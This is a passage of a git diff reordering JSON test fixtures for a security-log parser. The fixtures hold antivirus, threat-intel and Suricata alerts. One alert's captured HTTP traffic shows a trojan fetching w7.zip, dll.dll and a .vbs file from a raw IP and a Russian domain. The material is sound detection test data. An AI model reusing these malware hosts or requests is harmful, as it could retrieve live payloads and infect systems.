"Exp.SWF.Angler.D\",\"scan_result\":\"INFECTED\"},\"11\":{\"id\":\"ad05e0dc742bcd6251af91bd07ef470c699d5aebbb2055520b07021b14d7380c\",\"threat_details\":\"\",\"scan_result\":\"NOT_SCANNED\"},\"12\":{\"id\":\"af6868a2b87b3388a816e09d2b282629ccf883b763b3691368a27fbd6f6cd51a\",\"threat_details\":\"EXP/FLASH.Pubenush.E.Gen\",\"scan_result\":\"INFECTED\"},\"10\":{\"id\":\"a9b912e461cec506780d8ad8e785cca6b233ad7c72335c262b0a4ab189afa713\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"3\":{\"id\":\"312a189607571ec2c7544636be405f10889e73d061e0ed77ca0eca97a470838d\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107\",\"scan_result\":\"INFECTED\"},\"6\":{\"id\":\"4ca73ae4b92fd7ddcda418e6b70ced0481ac2d878c48e61b686d0c9573c331dc\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"13\":{\"id\":\"b14014e40c0e672e050ad9c210a68a5303ce7facabae9eb2ee07ddf97dc0da0e\",\"threat_details\":\"\",\"scan_result\":\"CLEAN\"},\"0\":{\"id\":\"038e407ba285f0e01dd30c6e4f77ec19bad5ed3dc866a2904ae6bf46baa14b74\",\"threat_details\":\"Script.SWF.CVE-2014-0515+.C107 (B)\",\"scan_result\":\"INFECTED\"},\"5\":{\"id\":\"3bfeb615a695c5ebaac5ade948ffae0c3cfec3787d4625e3abb27fa3c2867f53\",\"threat_details\":\"Exploit.SWF.Agent.ja\",\"scan_result\":\"INFECTED\"},\"15\":{\"id\":\"fe665976a02d03734c321007328109ab66823b260a8eea117d2ab49ee9dfd3f1\",\"threat_details\":\"Exploit.SWF\",\"scan_result\":\"INFECTED\"}},\"proto\":\"TCP\",\"code\":1,\"analyzed_error\":0,\"@version\":\"1\",\"magic_details\":\"Macromedia Flash data (compressed), version 14\"}",
diff --git a/GateWatcher/aioniq/tests/retrohunt.json b/GateWatcher/aioniq/tests/retrohunt.json
index d42b439ac..fd29bcfa4 100644
--- a/GateWatcher/aioniq/tests/retrohunt.json
+++ b/GateWatcher/aioniq/tests/retrohunt.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}"
+    }
   },
   "expected": {
     "message": "{\"external_links\":[{\"url\":\"https://urlhaus.abuse.ch/url/2269068/\",\"source_name\":\"URLHaus Abuse.ch\"}],\"relations\":[\"0e3cc27b-7999-48ce-8484-dc12b325a355\"],\"description\":\"IOC matching first tests\",\"event_type\":\"retrohunt\",\"kill_chain_phases\":[],\"timestamp_detected\":\"2023-06-09T14:08:46.845Z\",\"ioc_type\":\"Host\",\"severity\":1,\"community_id\":\"1:x0uuTl0mYnN1nwngep7+A4VH38I=\",\"ioc_creation_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_countries\":[],\"ioc_value\":\"im.a.very.bad.doma.in\",\"dest_ip\":\"2.2.2.2\",\"vulnerabilities\":[],\"matched_event\":\"bd7686c8-20db-427e-941d-844a5ecfe559\",\"risk\":\"Suspicious\",\"uuid\":\"416f35ad-b954-4b6a-a886-987b826bb7f4\",\"meta_data\":{\"ssdeep\":\"1536:87vbq1lGAXSEYQjbChaAU2yU23M51DjZgSQAvcYkFtZTjzBht5:8D+CAXFYQChaAUk5ljnQssL\",\"cwe\":[],\"descriptions\":[],\"tslh\":\"T16D7312E017B517CC1371A8353BED205E9128223972AE35302E97528DF957703BAB2DBE\",\"filetype\":\"ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux)\",\"size\":78.3984375,\"usageMode\":\"hunting\"},\"flow_id\":841376349480333,\"matched_event_type\":\"alert\",\"ioc_updated_date\":\"2023-06-12T10:00:35+00:00\",\"targeted_platforms\":[\"linux\"],\"signature\":\"RetroHunt - Host - malware/Unknown - Hajime - GW Lab Test - 00100035-1206-2023-cbf5-08330f0d5bc0\",\"ioc_tags\":[\"trojan.generickd.34055387 (b)\",\"linux/hajime.a trojan\",\"e32/agent.cd\",\"linux.hajime.bc\",\"backdoor.hajime.linux.129\",\"linux/hajime.75930\",\"unix.malware.agent-6626471-0\",\"linux/hajime.nsnlw\",\"hajime\",\"elf.mirai.43048.gc\",\"trojan.elfarm32.hajime.fbhtfi\",\"trojan.linux.hajime\",\"trojan.generickd.34055387\"],\"@version\":\"1\",\"type\":\"cti\",\"targeted_organizations\":[],\"campaigns\":[],\"categories\":[\"malware\"],\"src_port\":55614,\"gcenter\":\"gcenter-xxxxxxxxxxxxxxxxx.domain.local\",\"case_id\":\"00100035-1206-2023-edb6-b38911f8ba0c\",\"dest_port\":80,\"usage_mode\":\"hunting\",\"timestamp_package\":\"2023-06-12T10:00:35.012874+0000\",\"src_ip\":\"1.1.1.1\",\"ttp\":[],\"tlp\":\"green\",\"probability\":0.5,\"gcap\":\"gcap-xxxxxxxxxxxxxxxx.domain.local\",\"@timestamp\":\"2023-06-12T10:12:39.001Z\",\"timestamp_analyzed\":\"2023-06-12T10:12:39.001Z\",\"families\":[\"Hajime\"],\"ioc_id\":\"00100035-1206-2023-cbf5-08330f0d5bc0\",\"targeted_sectors\":[],\"threat_actor\":[\"GW Lab Test\"],\"matched_app_proto\":\"http\"}",
diff --git a/GateWatcher/aioniq/tests/sigflow-alert.json b/GateWatcher/aioniq/tests/sigflow-alert.json
index bbbc667e0..0d72ba216 100644
--- a/GateWatcher/aioniq/tests/sigflow-alert.json
+++ b/GateWatcher/aioniq/tests/sigflow-alert.json
@@ -1,12 +1,12 @@
 {
   "input": {
+    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /a35new/aw7.tiff HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\n\\r\\nGET /bsb/infects/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Windows%207%20Home%20Premium%20%20%20%20=%20%20%20%20%20%20%20N/A HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET /bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll HTTP/1.1\\r\\nHost: www.devyatinskiy.ru\\r\\n\\r\\n\",\"alert\":{\"signature\":\"ETPRO TROJAN MSIL/Bazidow.A HTTP C2\",\"category\":\"A Network Trojan was detected\",\"gid\":1,\"signature_id\":2828821,\"rev\":3,\"severity\":1,\"metadata\":{\"affected_product\":[\"Windows_XP_Vista_7_8_10_Server_32_64_Bit\"],\"performance_impact\":[\"Moderate\"],\"deployment\":[\"Perimeter\"],\"created_at\":[\"2017_12_07\"],\"updated_at\":[\"2022_05_03\"],\"former_category\":[\"MALWARE\"],\"attack_target\":[\"Client_Endpoint\"],\"signature_severity\":[\"Major\"]},\"action\":\"allowed\"}}",
     "sekoiaio": {
       "intake": {
         "dialect": "Gatewatcher AionIQ",
         "dialect_uuid": "0825709a-5f76-441e-9dfb-2b5ea6ce551c"
       }
-    },
-    "message": "{\"event_type\":\"alert\",\"http\":{\"url\":\"/bsb/debugnosso/index.php?N=GO-GO-GADGET-PC-inspector-gadget%20=%20%20%20%20Iniciou%20o%20executar%20%20http://65.181.125.193/a35new/w7.zip%7Chttp://65.181.125.193/a35new/w7.zip%7C32%7Chttp://65.181.125.193/a35new/dll.dll\",\"protocol\":\"HTTP/1.1\",\"hostname\":\"www.devyatinskiy.ru\",\"length\":0,\"http_method\":\"GET\"},\"timestamp_detected\":\"2023-03-22T10:25:55.690Z\",\"uuid\":\"fd5ba8ea-e263-426d-b4b2-a16521ae09b1\",\"packet_info\":{\"linktype\":1},\"severity\":1,\"in_iface\":\"monvirt\",\"src_ip\":\"1.1.1.1\",\"host\":\"gcap-xxxxxxxx.domain.local\",\"dest_ip\":\"2.2.2.2\",\"flow_id\":1408237495862400,\"dest_port\":16122,\"@timestamp\":\"2023-03-22T10:44:08.001Z\",\"timestamp_analyzed\":\"2023-03-22T10:44:08.001Z\",\"gcap\":\"gcap-xxxxxxx.domain.local\",\"type\":\"suricata\",\"src_port\":8550,\"metadata\":{\"flowbits\":[\"min.gethttp\",\"ETPROtxtminhead\",\"http.dottedquadhost.dll\"]},\"community_id\":\"1:hEBuGl9msx7YJtg3Tb/+Gf+a1VI=\",\"app_proto\":\"http\",\"packet\":\"kOK6pqSQkOK6pqSRCABFAAC7Uz1AAEAGPT4py4AkHxzgtiFmPvokcIbSnp074oAYAGsSTgAAAQEICmgi0xNoItMTR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaWFyJTdCNjklN0QgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCg0K\",\"proto\":\"TCP\",\"stream\":1,\"flow\":{\"bytes_toclient\":90364,\"bytes_toserver\":3084,\"pkts_toserver\":19,\"pkts_toclient\":66,\"start\":\"2023-03-22T10:25:55.345216+0000\"},\"tx_id\":5,\"ether\":{\"dest_mac\":\"90:e2:ba:a6:a4:90\",\"src_mac\":\"90:e2:ba:a6:a4:91\"},\"payload\":\"R0VUIC9kb3dubG9hZC9RanRHRGx0bWNlLzE2MDgyMDE2dmVjTzdPa0wzeUxQSUNsZW96aWJLRS52YnM/ZHNpZD1ndjVucTMuNDAwYjg2YzcxOTZmOWU4Y2NkZTM1MzcwZWIwYTU0Yjkmc2Jzcj0yZjViMmRmMGFlMGE4Yzc1NTFjN2RmMGJjNDZhOWQ3OTk4MCZsZ2ZwPTMwMDAgSFRUUC8xLjENCkFjY2VwdDogdGV4dC9odG1sLCBhcHBsaWNhdGlvbi94aHRtbCt4bWwsICovKg0KQWNjZXB0LUxhbmd1YWdlOiBlbi1VUw0KVXNlci1BZ2VudDogTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBXT1c2NDsgVHJpZGVudC83LjA7IHJ2OjExLjApIGxpa2UgR2Vja28NCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KSG9zdDogZGM1MjQuNHNoYXJlZC5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkNvb2tpZTogZGF5MWhvc3Q9aA0KDQpHRVQgL3dlYi9jZG4vcG9wdWxhci9kb3dubG9hZC9RanRHRGx0bWNlP2NvbnREaXNwPWF0dGFjaG1lbnQlM0IrZmlsZW5hbWUlM0QlMjIxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMlMjIlM0IrZmlsZW5hbWUqJTNEdXRmLTglMjclMjcxNjA4MjAxNnZlY083T2tMM3lMUElDbGVvemliS0VIYTg2MUh6aDlHRi52YnMmY29udFR5cGU9QVBQTElDQVRJT04lMkZPQ1RFVC1TVFJFQU0mY2RuaD03YTc0NTUzYTA1N2VhNTVmYzU2OGI4MGU2MGNkN2ZhMiZkM2M9ZmRzUWp0R0RsdG1jZSUzRElOSVRJQUxJWkVEJTNCK2RvbWFpbiUzRC40c2hhcmVkLmNvbSUzQitleHBpcmVzJTNEV2VkJTJDKzE3LUF1Zy0yMDE2KzAxJTNBMzYlM0E0NCtHTVQlM0IrcGF0aCUzRCUyRiBIVFRQLzEuMQ0KQWNjZXB0OiB0ZXh0L2h0bWwsIGFwcGxpY2F0aW9uL3hodG1sK3htbCwgKi8qDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbw0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpDb29raWU6IGRheTFob3N0PWgNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IGNkbmZpbGVzLjRzaGFyZWQuY29tDQoNCkdFVCAvYTM1bmV3L3c3LnR4dCBIVFRQLzEuMQ0KSG9zdDogNjUuMTgxLjEyNS4xOTMNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9hMzVuZXcvYXc3LnRpZmYgSFRUUC8xLjENCkhvc3Q6IDY1LjE4MS4xMjUuMTkzDQoNCkdFVCAvYnNiL2luZmVjdHMvaW5kZXgucGhwP049R08tR08tR0FER0VULVBDLWluc3BlY3Rvci1nYWRnZXQlMjA9JTIwJTIwJTIwJTIwV2luZG93cyUyMDclMjBIb21lJTIwUHJlbWl1bSUyMCUyMCUyMCUyMD0lMjAlMjAlMjAlMjAlMjAlMjAlMjBOL0EgSFRUUC8xLjENCkhvc3Q6IHd3dy5kZXZ5YXRpbnNraXkucnUNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0KR0VUIC9ic2IvZGVidWdub3Nzby9pbmRleC5waHA/Tj1HTy1HTy1HQURHRVQtUEMtaW5zcGVjdG9yLWdhZGdldCUyMD0lMjAlMjAlMjAlMjBJbmljaW91JTIwbyUyMGV4ZWN1dGFyJTIwJTIwaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy93Ny56aXAlN0NodHRwOi8vNjUuMTgxLjEyNS4xOTMvYTM1bmV3L3c3LnppcCU3QzMyJTdDaHR0cDovLzY1LjE4MS4xMjUuMTkzL2EzNW5ldy9kbGwuZGxsIEhUVFAvMS4xDQpIb3N0OiB3d3cuZGV2eWF0aW5za2l5LnJ1DQoNCg==\",\"@version\":\"1\",\"gcenter\":\"gcenter-xxxxxxxx.domain.local\",\"payload_printable\":\"GET /download/QjtGDltmce/16082016vecO7OkL3yLPICleozibKE.vbs?dsid=gv5nq3.400b86c7196f9e8ccde35370eb0a54b9&sbsr=2f5b2df0ae0a8c7551c7df0bc46a9d79980&lgfp=3000 HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nHost: dc524.4shared.com\\r\\nConnection: Keep-Alive\\r\\nCookie: day1host=h\\r\\n\\r\\nGET /web/cdn/popular/download/QjtGDltmce?contDisp=attachment%3B+filename%3D%2216082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs%22%3B+filename*%3Dutf-8%27%2716082016vecO7OkL3yLPICleozibKEHa861Hzh9GF.vbs&contType=APPLICATION%2FOCTET-STREAM&cdnh=7a74553a057ea55fc568b80e60cd7fa2&d3c=fdsQjtGDltmce%3DINITIALIZED%3B+domain%3D.4shared.com%3B+expires%3DWed%2C+17-Aug-2016+01%3A36%3A44+GMT%3B+path%3D%2F HTTP/1.1\\r\\nAccept: text/html, application/xhtml+xml, */*\\r\\nAccept-Language: en-US\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\\r\\nAccept-Encoding: gzip, deflate\\r\\nCookie: day1host=h\\r\\nConnection: Keep-Alive\\r\\nHost: cdnfiles.4shared.com\\r\\n\\r\\nGET /a35new/w7.txt HTTP/1.1\\r\\nHost: 65.181.125.193\\r\\nConnection: Keep-Alive\\r\\n\\r\\nGET 